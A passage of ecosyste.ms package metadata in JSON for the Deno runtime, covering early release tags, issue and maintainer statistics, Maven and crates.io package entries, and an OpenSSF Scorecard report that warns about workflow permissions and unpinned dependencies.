1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T07:00:04.447Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":30.80506352090282,"dependent_packages_count":44.04104293311412,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":37.42305322700847},"purl":"pkg:maven/org.mvnpm.at.deno/darwin-arm64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:darwin-arm64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:darwin-arm64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:darwin-arm64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":622178,"maintainers_count":0,"namespaces_count":82612,"keywords_count":37065,"github":"maven-central","metadata":{"funded_packages_count":49047,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-08T05:02:10.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4047429,"name":"deno_ffi","ecosystem":"cargo","description":"Dynamic library ffi for deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":244,"first_release_published_at":"2021-08-10T09:20:44.046Z","latest_release_published_at":"2026-08-27T15:22:01.062Z","latest_release_number":"0.245.0","last_synced_at":"2026-09-07T22:56:27.915Z","created_at":"2022-04-12T10:00:36.199Z","updated_at":"2026-09-07T22:56:27.916Z","registry_url":"https://crates.io/crates/deno_ffi/","install_command":"cargo install deno_ffi","documentation_url":"https://docs.rs/deno_ffi/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned 